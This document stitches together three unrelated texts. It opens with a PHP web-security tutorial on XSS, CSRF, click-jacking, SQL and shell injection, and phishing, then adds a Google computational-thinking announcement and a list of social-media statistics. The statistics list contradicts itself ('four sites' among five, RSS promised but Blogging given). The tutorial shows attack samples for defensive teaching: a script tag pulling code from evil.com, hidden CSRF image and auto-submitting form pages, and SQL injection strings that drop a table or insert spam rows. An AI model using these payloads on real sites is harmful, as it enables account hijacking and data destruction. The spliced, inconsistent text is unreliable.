Web application developers today need to be skilled in a multitude of disciplines. It’s necessary to build an application that is user friendly, highly performant, accessible and secure, all while executing partially in an untrusted environment that you, the developer, have no control over. I speak, of course, of the user agent: most commonly a web browser, but in reality, one never really knows what’s on the other end of the HTTP connection.

There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we’re careful with the code we write, the answer to these questions can often be one we’d rather not hear.

We’ll skip over denial of service attacks in this article and take a close look at the other issues. To stick with standard terminology, we’ll talk about Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), click-jacking, SQL injection, shell injection and phishing. We’ll also assume PHP as the language of development, but the problems apply regardless of language, and solutions will be similar in other languages.

1. Cross-site scripting (XSS)

Cross-site scripting is an attack in which a user is tricked into executing code from an attacker’s site (say evil.com) in the context of our website (let’s call it www.mybiz.com). This is a problem regardless of what our website does, but the severity of the problem changes depending on what our users can do on the site. Let’s look at an example.

Let’s say that our site allows the user to post cute little messages for the world (or maybe only their friends) to see. We’d have code that looks something like this:

```php
<?php
  echo "$user said $message";
?>
```

To read the message in from the user, we’d have code like this:

```php
<?php
  // ?? avoids "undefined index" warnings when nothing was sent
  $user = $_COOKIE['user'] ?? null;
  $message = $_REQUEST['message'] ?? null;
  if ($message) {
    save_message($user, $message);
  }
?>
<input type="text" name="message" value="">
```

This works only as long as the user sticks to messages in plain text, or perhaps a few harmless formatting tags such as bold or italics. We’re essentially trusting the user to enter only safe text. An attacker, though, may enter something like this:

```html
Hi there...<script src="h++p://evil.com/bad-script.js"></script>
```

(Note that I’ve changed http to h++p to prevent auto-linking of the URL).

When a user views this message, their browser loads bad-script.js, and that script can do anything it wants. For example, it could steal the contents of document.cookie and use it to impersonate the user, perhaps sending spam from their account. More subtly, it could change the contents of the HTML page to do nasty things, possibly installing malware onto the reader’s computer. Remember that bad-script.js now executes in the context of www.mybiz.com.

This happens because we’ve trusted the user more than we should. If, instead, we only allow the user to enter content that is safe to display on the page, we prevent this form of attack. We accomplish this using PHP’s filter extension (filter_input() and related functions).

We can change our PHP code to the following:

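```php
<?php
  $user = filter_input(INPUT_COOKIE, 'user',
                       FILTER_SANITIZE_SPECIAL_CHARS);
  // filter_input() reads a single source; OR-ing INPUT_POST | INPUT_GET
  // does not combine them, so check POST first and fall back to GET.
  $message = filter_input(INPUT_POST, 'message',
                          FILTER_SANITIZE_SPECIAL_CHARS)
          ?? filter_input(INPUT_GET, 'message',
                          FILTER_SANITIZE_SPECIAL_CHARS);
  if ($message) {
    save_message($user, $message);
  }
?>
<input type="text" name="message" value="">
```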

Notice that we run the filter on the input and not just before output. We do this to protect against the situation where a new use case arises in the future, or a new programmer joins the project and forgets to sanitize data before printing it out. By filtering at the input layer, we ensure that we never store unsafe data. The side effect is that data which needs to be displayed in a non-web context (e.g. a mobile text or pager message) may be unsuitably encoded, so you may need to process it further before sending it to that context.
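To see what actually ends up in the database, the sketch below runs a message like the attacker’s through the same FILTER_SANITIZE_SPECIAL_CHARS filter. It uses filter_var(), which applies a filter to an ordinary string, instead of filter_input(), which reads from the request, so it can be tried from the command line; the sample message is made up for illustration.

```php
<?php
// A message like the attacker's (h++p instead of http, as in the article).
$attack = 'Hi there...<script src="h++p://evil.com/bad-script.js"></script>';

// filter_var() applies the same filter that filter_input() uses in the
// form handler, but to a plain string instead of request data.
$stored = filter_var($attack, FILTER_SANITIZE_SPECIAL_CHARS);

// '<', '>' and '"' are now numeric HTML entities, so a browser shows the
// markup as text instead of loading bad-script.js.
echo $stored, PHP_EOL;
```

The angle brackets and quotes come out as numeric entities such as &#60; and &#34;, which is exactly what makes the stored text inert when it is echoed back later.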

Chances are that almost everything you get from the user is going to be written back to the browser at some point, so it may be best to make FILTER_SANITIZE_SPECIAL_CHARS the default filter by setting filter.default = special_chars in your php.ini file. (The ini setting takes the filter’s name, not the PHP constant.)

PHP has many different input filters, and it’s important to use the one most relevant to your data. Very often an XSS creeps in because we use FILTER_SANITIZE_SPECIAL_CHARS when we should have used FILTER_SANITIZE_ENCODED or FILTER_SANITIZE_URL or vice-versa. You should also carefully review any code that uses something like html_entity_decode, because this could potentially open your code up for attack by undoing the encoding added by the input filter.
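The sketch below makes that difference concrete: one made-up string passed through FILTER_SANITIZE_SPECIAL_CHARS (for text in an HTML page) and FILTER_SANITIZE_ENCODED (for a value inside a URL), followed by html_entity_decode() quietly undoing the first. filter_var() stands in for filter_input() here so that it runs without a web request.

```php
<?php
$input = 'Tom & Jerry <b>';

// For text written into an HTML page: HTML-encode the special characters.
$forHtml = filter_var($input, FILTER_SANITIZE_SPECIAL_CHARS);

// For a value placed inside a URL (e.g. a query-string parameter): URL-encode.
$forUrl = filter_var($input, FILTER_SANITIZE_ENCODED);

// html_entity_decode() turns the entities back into raw markup,
// undoing the protection the filter added.
$undone = html_entity_decode($forHtml);

echo $forHtml, PHP_EOL, $forUrl, PHP_EOL, $undone, PHP_EOL;
```

Neither output is safe in the other’s context: the HTML-encoded version still contains & and # characters, which have special meaning inside a URL.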

If a site is open to XSS attacks, then its users’ data is not safe.

2. Cross-site request forgery (CSRF)

A CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors into carrying out an action on our site. This can happen if a user logs in to a site that they use a lot (e.g. e-mail, Facebook, etc.), and then visits a malicious site without first logging out. If the original site is susceptible to a CSRF attack, then the malicious site can do evil things on the user’s behalf. Let’s take the same example as above.

Since our application reads in input either from POST data or from the query string, an attacker could trick our user into posting a message by including code like this on their website:

```html
<img src="h++p://www.mybiz.com/post_message?message=Cheap+medicine+at+h++p://evil.com/"
     style="position:absolute;left:-999em;">
```

Now all the attacker needs to do is get users of mybiz.com to visit their site. This is fairly easily accomplished by, for example, hosting a game, or pictures of cute baby animals. When the user visits the attacker’s site, their browser sends a GET request to www.mybiz.com/post_message. Since the user is still logged in to www.mybiz.com, the browser sends along the user’s cookies, thereby posting an advertisement for cheap medicine to all the user’s friends.

Simply changing our code to only accept submissions via POST doesn’t fix the problem. The attacker can change the code to something like this:

```html
<iframe name="pharma" style="display:none;"></iframe>
<form id="pform"
      action="h++p://www.mybiz.com/post_message"
      method="POST"
      target="pharma">
  <input type="hidden" name="message" value="Cheap medicine at ...">
</form>
<script>document.getElementById('pform').submit();</script>
```

This submits the form to www.mybiz.com as a POST request, invisibly and with the user’s cookies attached.

The correct way to protect against CSRF is to use a single-use token tied to the user. This token is issued only to a signed-in user and is based on the user’s account, a secret salt and possibly a timestamp. When the user submits the form, the token is validated, which ensures that the request originated from a page that we control. The token only needs to be issued when a form submission can do something on behalf of the user, so there’s no need to use it for publicly accessible read-only data. The token is sometimes referred to as a nonce.

There are several different ways to generate a nonce. For example, have a look at the wp_create_nonce, wp_verify_nonce and wp_salt functions in the WordPress source code. A simple nonce may be generated like this:

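```php
<?php
// $salt is a server-side secret; $user identifies the signed-in user.
// Both are passed in, because a PHP function can't see outer variables.
function get_nonce($user, $salt) {
  return md5($salt . ":" . $user . ":" . ceil(time()/86400));
}
?>
```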

The timestamp we use is the current time to an accuracy of 1 day (86400 seconds), so it’s valid as long as the action is executed within a day of requesting the page. We could reduce that value for more sensitive actions (like password changes or account deletion). It doesn’t make sense to have this value larger than the session timeout time.
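md5() over concatenated strings is fine for illustration, but a keyed hash is the more conventional way to mix in a secret. The sketch below swaps in hash_hmac() with SHA-256, keyed by the secret salt, and checks submissions with hash_equals(), which compares in constant time. make_day_nonce(), check_day_nonce() and the $now parameter (there so tests can fix the clock) are hypothetical names of our own, not from WordPress or any library.

```php
<?php
const NONCE_LIFETIME = 86400; // one day, in seconds

// Build a nonce for $user that changes once per NONCE_LIFETIME window.
function make_day_nonce(string $user, string $salt, int $now): string
{
    $window = (int) ceil($now / NONCE_LIFETIME);
    return hash_hmac('sha256', $user . ':' . $window, $salt);
}

// Recompute the nonce for the current window and compare in constant time.
function check_day_nonce(string $nonce, string $user, string $salt, int $now): bool
{
    return hash_equals(make_day_nonce($user, $salt, $now), $nonce);
}

$salt  = 'replace-with-a-long-random-secret'; // hypothetical secret
$now   = time();
$nonce = make_day_nonce('alice', $salt, $now);
var_dump(check_day_nonce($nonce, 'alice', $salt, $now));
```

Like the md5() version, a nonce issued just before a window boundary stops validating moments later. One common remedy is to also accept the nonce from the previous window, at the cost of a longer maximum lifetime.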

An alternative is to generate a random nonce and store it in a session variable (or in a server-side database) along with the time when it was generated. Because the nonce no longer depends on the user name or the time, an attacker has nothing to guess when trying to generate it.

```php
<?php
function get_nonce() {
  // random_bytes() (PHP 7+) returns cryptographically secure random bytes
  $nonce = bin2hex(random_bytes(32));
  $_SESSION['nonce'] = $nonce;
  $_SESSION['nonce_time'] = time();
  return $nonce;
}
?>
```

We use this nonce in the input form, and when the form is submitted, we regenerate the nonce or read it out of the session variable and compare it with the submitted value. If the two match, then we allow the action to go through. If the nonce has timed out since it was generated, then we reject the request.

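```php
<?php
  // verify_nonce() compares the submitted value with the expected nonce;
  // ?? '' avoids a warning when no nonce was submitted at all.
  if (!verify_nonce($_POST['nonce'] ?? '')) {
    header("HTTP/1.1 403 Forbidden", true, 403);
    exit();
  }
  // proceed normally
?>
```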

This protects us from the CSRF attack, since the attacker’s website can neither generate our nonce nor read it from our pages.
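verify_nonce() is left undefined in the handler above. One possible shape for it, paired with a session-stored nonce, is sketched below under a few assumptions: the nonce is random, it lives for one hour (NONCE_TTL), it is discarded once checked, and the session array is passed in by reference so the functions can be exercised without session_start(). In a real page you would pass $_SESSION. issue_nonce() and verify_session_nonce() are hypothetical names.

```php
<?php
const NONCE_TTL = 3600; // assumed lifetime: one hour

// Create a random nonce and remember it (and when it was made) in the session.
function issue_nonce(array &$session, int $now): string
{
    $nonce = bin2hex(random_bytes(32));
    $session['nonce'] = $nonce;
    $session['nonce_time'] = $now;
    return $nonce;
}

// Accept the submitted nonce only if it matches the stored one and is fresh.
function verify_session_nonce($submitted, array &$session, int $now): bool
{
    if (!is_string($submitted) || !isset($session['nonce'], $session['nonce_time'])) {
        return false;
    }
    $fresh = ($now - $session['nonce_time']) <= NONCE_TTL;
    $valid = $fresh && hash_equals($session['nonce'], $submitted);
    // Single use: once a string has been checked, the stored nonce is
    // discarded whether or not it matched.
    unset($session['nonce'], $session['nonce_time']);
    return $valid;
}

// Form page: echo '<input type="hidden" name="nonce" value="'
//                . issue_nonce($_SESSION, time()) . '">';
// Handler:   if (!verify_session_nonce($_POST['nonce'] ?? null, $_SESSION, time())) { /* 403 */ }
```

Discarding the nonce after each check keeps it single-use, but it also means a user with the form open in two tabs can submit only one of them; keeping a small set of outstanding nonces is one way around that.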

If you don’t use a nonce, your user can be tricked into doing things they would not normally do. Note that even if you do use a nonce, you may still be susceptible to a click-jacking attack.

3. Click-jacking

While not on the OWASP top ten list for 2010, click-jacking has gained recent fame due to attacks against Twitter and Facebook, both of which spread very quickly due to the social nature of these platforms.

Since we use a nonce, we’re protected against CSRF attacks. However, if the user is tricked into clicking the submit button themselves, the nonce won’t protect us. In this kind of attack, the attacker includes our website in an iframe on their own website. The attacker doesn’t have control over our page, but they do control the iframe element. They use CSS to set the iframe’s opacity to 0, and then use JavaScript to move it around so that our submit button is always under the user’s mouse. This was the technique used in the click-jacking attack on the Facebook Like button.

Frame busting appears to be the most obvious way to protect against this; however, it isn’t foolproof. For example, adding the security="restricted" attribute to an iframe will stop any frame-busting code from working in Internet Explorer, and there are ways to prevent frame busting in Firefox as well.

A better way might be to make your submit button disabled by default and then use JavaScript to enable it once you’ve determined that it’s safe to do so. In our example above, we’d have code like this:

```html
<input type="text" name="message" value="">
<input id="msg_btn" type="submit" disabled>
<script type="text/javascript">
  // Enable the button only when this page is not inside a frame
  if (window.top === window.self) {
    document.getElementById("msg_btn").disabled = false;
  }
</script>
```

This way we ensure that the submit button cannot be clicked on unless our page runs in a top level window. Unfortunately, this also means that users with JavaScript disabled will also be unable to click the submit button.

4. SQL injection

In this kind of attack, the attacker exploits insufficient input validation to run arbitrary SQL statements against your database. XKCD has a humorous take on SQL injection:

[Image: XKCD comic on SQL injection]

Let’s go back to the example we have above. In particular, let’s look at the save_message() function.

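```php
<?php
function save_message($user, $message)
{
  // UNSAFE: $user and $message are pasted straight into the SQL string.
  // (mysql_query() belongs to the old mysql extension, removed in PHP 7.)
  $sql = "INSERT INTO Messages (
    user, message
  ) VALUES (
    '$user', '$message'
  )";

  return mysql_query($sql);
}
?>
```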

The function is oversimplified here, but it exemplifies the problem. The attacker could enter something like this:

```
test');DROP TABLE Messages;--
```

When this gets passed to the database, it could end up dropping the Messages table, causing you and your users a lot of grief. This kind of an attack calls attention to the attacker, but little else. It’s far more likely for an attacker to use this kind of attack to insert spammy data on behalf of other users. Consider this message instead:

```
test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...
```

Here the attacker has successfully managed to insert spammy messages into the comment streams from user2 and user3 without needing access to their accounts. The attacker could also use this to download your entire user table that possibly includes usernames, passwords and email addresses.
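It helps to look at the exact string the naive save_message() hands to the database. The sketch below only builds the query and never connects to one; build_message_sql() is a hypothetical helper that repeats the same interpolation on a single line.

```php
<?php
// Same string interpolation as the vulnerable save_message(), on one line.
function build_message_sql(string $user, string $message): string
{
    return "INSERT INTO Messages (user, message) VALUES ('$user', '$message')";
}

$payload = "test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...";
echo build_message_sql('alice', $payload), PHP_EOL;
// prints: INSERT INTO Messages (user, message) VALUES ('alice', 'test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...')
```

The attacker’s quote closes our string literal early, and the rest of the input is parsed as two extra rows.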

Fortunately, we can use prepared statements to get around this problem. In PHP, the PDO abstraction layer makes it easy to use prepared statements even if your database itself doesn’t support them. We could change our code to use PDO.

```php
<?php
function save_message($user, $message)
{
  // $dbh is a global database handle
  global $dbh;

  $stmt = $dbh->prepare('
    INSERT INTO Messages (
      user, message
    ) VALUES (
      ?, ?
    )');
  return $stmt->execute(array($user, $message));
}
?>
```

This protects us from SQL injection by making sure that everything in $user goes into the user field and everything in $message goes into the message field, even if it contains database metacharacters.

There are cases where it’s hard to use prepared statements, for example when you have a list of values in an IN clause. However, since our SQL statements are always generated by code, we can first determine how many items need to go into the IN clause and add that many ? placeholders.
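A minimal sketch of that idea: in_placeholders() (a hypothetical helper) returns one ? per value, while the values themselves still travel separately through execute(). It throws on an empty list, since most databases reject an empty IN ().

```php
<?php
// Return "?, ?, ?" with one placeholder per value.
function in_placeholders(array $values): string
{
    if (count($values) === 0) {
        // Most databases reject "IN ()", so refuse to build it.
        throw new InvalidArgumentException('IN clause needs at least one value');
    }
    return implode(', ', array_fill(0, count($values), '?'));
}

$users = ['alice', 'bob', 'carol'];
$sql = 'SELECT message FROM Messages WHERE user IN (' . in_placeholders($users) . ')';
echo $sql, PHP_EOL; // SELECT message FROM Messages WHERE user IN (?, ?, ?)

// With the PDO handle from save_message():
//   $stmt = $dbh->prepare($sql);
//   $stmt->execute(array_values($users)); // positional ? needs a plain list
```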

5. Shell injection

As with SQL injection, the attacker crafts an input string, but this time the goal is shell access to your web server. Once they have shell access, they could potentially do a lot more. Depending on access privileges, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network.

Shell injection can take place whenever you pass untreated user input to the shell, for example through system(), exec(), passthru(), shell_exec() or the backtick operator. Other languages have their own equivalents, so check which functions in your stack hand strings to a shell.

The solution is the same as for XSS attacks: validate and sanitize all user input appropriately for the context where it will be used. For data that gets written back into an HTML page, we use PHP’s filter_input() function with the FILTER_SANITIZE_SPECIAL_CHARS filter. For data that gets passed to the shell, we use the escapeshellcmd() and escapeshellarg() functions. It’s also a good idea to validate the input to make sure it only contains a whitelist of characters. Always use a whitelist instead of a blacklist; attackers find inventive ways of getting around a blacklist.
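Here is a sketch combining both steps for a single user-supplied file name, assuming a Unix-like shell: a whitelist check first, then escapeshellarg() so the value reaches the command as one quoted argument. The wc -l command, the allowed character set and the function names are illustrative assumptions.

```php
<?php
// Whitelist: letters, digits, underscore, dot and hyphen, and the first
// character may not be a dot or hyphen (blocks "../x" and "-option" tricks).
function is_safe_filename(string $name): bool
{
    return preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]*$/', $name) === 1;
}

// Build a command with the user-supplied value passed as a single quoted argument.
function build_wc_command(string $filename): string
{
    if (!is_safe_filename($filename)) {
        throw new InvalidArgumentException('Rejected filename');
    }
    return 'wc -l ' . escapeshellarg($filename);
}

echo build_wc_command('report.txt'), PHP_EOL;
// The string would then go to e.g. exec(); it is only printed here.
```

Validation does most of the work; escapeshellarg() is a second layer in case the whitelist is loosened later. escapeshellcmd(), by contrast, escapes metacharacters across a whole command string but still lets a user slip in extra arguments, so quoting each argument with escapeshellarg() is usually the safer choice.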

If an attacker can gain shell access to your box, all bets are off. You may need to wipe everything off that box and reimage it. If any passwords or secret keys were stored on that box (in configuration files or source code), they will need to be changed at all locations where they are used. This could prove quite costly for your organization.

6. Phishing

Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page that looks exactly like your login page, and ask the user to log in there by sending them a link via e-mail, IM, Facebook, or something similar. Since the attacker’s page looks identical to yours, the user may enter their login credentials without realizing that they’re on a malicious site. The primary method to protect your users from phishing is user training, and there are a few things that you could do for this to be effective.

  1. Always serve your login page over SSL. This requires more server resources, but it means the user’s browser verifies your site’s certificate, confirming that the page really comes from you rather than from a malicious site.
  2. Use one and only one URL for user login, and make it short and easy to recognize. For our example website, we could use https://login.mybiz.com as our login URL. It’s important that when users see a login form for our website, they also see this URL in the URL bar. That trains users to be suspicious of login forms on other URLs.
  3. Do not allow partners to ask your users for their credentials on your site. Instead, if partners need to pull user data from your site, provide them with an OAuth-based API. Asking users to hand their password to a third party is known as the Password Anti-Pattern.
  4. Alternatively, you could use something like a sign-in image that some websites are starting to use (e.g. Bank of America, Yahoo!). This is an image that the user selects on your website, that only the user and your website know about. When the user sees this image on the login page, they know that this is the right page. Note that if you use a sign-in seal, you should also use frame busting to make sure an attacker cannot embed your sign-in image page in their phishing page using an iframe.
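Points 1 and 2 can be enforced at the top of the login script: if the request did not arrive over HTTPS at the one canonical login host, redirect there. A minimal sketch, assuming the https://login.mybiz.com URL from the example and a server that sets $_SERVER['HTTPS'] for secure requests (behind a TLS-terminating proxy the check would need adjusting). login_redirect_target() is a hypothetical helper.

```php
<?php
const LOGIN_HOST = 'login.mybiz.com'; // the single canonical login host

// Return the URL to redirect to, or null if this request is already the
// HTTPS login page on the canonical host.
function login_redirect_target(array $server): ?string
{
    // Some servers set HTTPS to "off" rather than leaving it unset.
    $https = !empty($server['HTTPS']) && strtolower($server['HTTPS']) !== 'off';
    $host  = $server['HTTP_HOST'] ?? '';
    if ($https && strcasecmp($host, LOGIN_HOST) === 0) {
        return null;
    }
    return 'https://' . LOGIN_HOST . '/';
}

// At the top of the login page:
//   $target = login_redirect_target($_SERVER);
//   if ($target !== null) {
//       header('Location: ' . $target, true, 301);
//       exit();
//   }
```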

If a user is trained to hand over their password to anyone who asks for it, then their data isn’t safe.

Summary

While we’ve covered a lot in this article, it still only skims the surface of web application security. Any developer interested in building truly secure applications has to be on top of their game at all times. Stay up to date with various security related mailing lists, and make sure all developers on your team are clued in. Sometimes it may be necessary to sacrifice features for security, but the alternative is far scarier.

Finally, I’d like to thank the Yahoo! Paranoids for all their help in writing this article.

Over the past year, a group of California-credentialed teachers along with Google engineers came together to discuss and explore ideas about how to incorporate computational thinking into the K-12 curriculum to enhance student learning and build this critical 21st century skill in everyone.

What exactly is computational thinking? Well, that depends on whom you ask, as there are several existing resources on the web that define the term slightly differently. Google defines computational thinking (CT) as a set of skills that software engineers use to write the programs that underlie all of the computer applications you use every day. Specific CT techniques include:

  • Problem decomposition: the ability to break down a problem into sub-problems
  • Pattern recognition: the ability to notice similarities, differences, properties, or trends in data
  • Pattern generalization: the ability to filter out unnecessary details and generalize those that are necessary in order to define a concept or idea in general terms
  • Algorithm design: the ability to build a repeatable, step-by-step process to solve a particular problem

Given the increasing prevalence of technology in our day-to-day lives and in most careers outside of computer science, Google believes that it is important to raise this base level of understanding in everyone.

To this end, Google is introducing you to a new resource: Exploring Computational Thinking. Similar to some of our other initiatives in education, including CS4HS and Google Code University, this program is committed to providing educators with access to our curriculum models, resources, and communities to help them learn more about CT, discuss it as a strategy for teaching and understanding core curriculum, as well as easily incorporate CT into their own curriculum, whether it be in math, science, language, history or beyond. The materials developed by the team reflect both the teachers’ expertise in pedagogy and K-12 curriculum as well as our engineers’ problem-solving techniques that are critical to the tech industry.

Prior to launching this program, Google reached out to several educators and classrooms and had them try the materials. Here’s some of the feedback Google received:

  • CT as a strategy for teaching and student learning works well with many subjects, and can easily be incorporated to support the existing K-12 curriculum
  • Models help to call out the specific CT techniques and provide more structure around the topics taught by educators, many of whom were already unknowingly applying CT in their classrooms
  • Including programming exercises in the classroom can significantly enrich a lesson by both challenging the advanced students and motivating the students who have fallen behind
  • Google’s examples provide educators with a means of re-teaching topics that students have struggled with in the past, without simply going through the same lesson that frustrated them before

To learn more about the program or access CT curriculum materials and other resources, visit www.google.com/edu/ect.

It’s not hard to find some general facts and figures about the 5 most popular social media networks. A quick Google search yields a plethora of information thanks to Wikipedia and other related sites. Heck, there’s even a movie coming out about the origin of Facebook.

But what about the less well-known facts about the social networks we know and love (and hate)? Thanks to Danny Brown, we now know much more about each of the top 5 social networks. The list includes interesting and even mind-boggling facts about Twitter, Facebook, LinkedIn, YouTube, and RSS.

What’s your favorite fact? Do you know something not on this list? Let us know in the comments or on Twitter by mentioning @edudemic. The miracle of social networking…

Facebook

1. The average Facebook user has 130 friends.
2. More than 25 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) are shared each month.
3. Over 300,000 users helped translate the site through the translations application.
4. More than 150 million people engage with Facebook on external websites every month.
5. Two-thirds of comScore’s U.S. Top 100 websites and half of comScore’s Global Top 100 websites have integrated with Facebook.
6. There are more than 100 million active users currently accessing Facebook through their mobile devices.
7. People who access Facebook via mobile are twice as active as non-mobile users (think about that when designing your Facebook page).
8. The average Facebook user is connected to 60 pages, groups and events.
9. People spend over 500 billion minutes per month on Facebook.
10. There are more than 1 million entrepreneurs and developers from 180 countries on Facebook.

Statistics from Facebook press office.

Twitter

11. Twitter’s web platform only accounts for a quarter of its users – 75% use third-party apps.
12. Twitter gets more than 300,000 new users every day.
13. There are currently 110 million users of Twitter’s services.
14. Twitter receives 180 million unique visits each month.
15. There are more than 600 million searches on Twitter every day.
16. Twitter started as a simple SMS-text service.
17. Over 60% of Twitter use is outside the U.S.
18. There are more than 50,000 third-party apps for Twitter.
19. Twitter has donated access to all of its tweets to the Library of Congress for research and preservation.
20. More than a third of users access Twitter via their mobile phone.

Statistics from Twitter and the Chirp Conference.

LinkedIn

21. LinkedIn is the oldest of the four sites in this post, having been created on May 5, 2003.
22. There are more than 70 million users worldwide.
23. Members of LinkedIn come from more than 200 countries from every continent.
24. LinkedIn is available in six native languages – English, French, German, Italian, Portuguese and Spanish.
25. Oracle’s Chief Financial Officer, Jeff Epstein, was headhunted for the position via his LinkedIn profile.
26. 80% of companies use LinkedIn as a recruitment tool.
27. A new member joins LinkedIn every second.
28. LinkedIn receives almost 12 million unique visitors per day.
29. Executives from all Fortune 500 companies are on LinkedIn.
30. Recruiters account for 1-in-20 LinkedIn profiles.

Statistics from LinkedIn press centre and SysComm International.

YouTube

31. The very first video uploaded was called “Me at the Zoo”, on 23rd April 2005.
32. By June 2006, more than 65,000 videos were being uploaded every day.
33. YouTube receives more than 2 billion views per day.
34. Every minute, 24 hours of video is uploaded to YouTube.
35. The U.S. accounts for 70% of YouTube users.
36. Over half of YouTube’s users are under 20 years old.
37. You would need to live for around 1,000 years to watch all the videos currently on YouTube.
38. YouTube is available in 19 countries and 12 languages.
39. Music videos account for 20% of uploads.
40. YouTube uses the same amount of bandwidth as the entire Internet used in 2000.

Statistics from YouTube press centre.

Blogging

41. 77% of Internet users read blogs.
42. There are currently 133 million blogs listed on leading blog directory Technorati.
43. 60% of bloggers are between the ages of 18 and 44.
44. One in five bloggers update their blogs daily.
45. Two thirds of bloggers are male.
46. Corporate blogging accounts for 14% of blogs.
47. 15% of bloggers spend 10 hours a week blogging.
48. More than half of all bloggers are married and/or parents.
49. More than 50% of bloggers have more than one blog.
50. Bloggers use an average of five different social sites to drive traffic to their blog.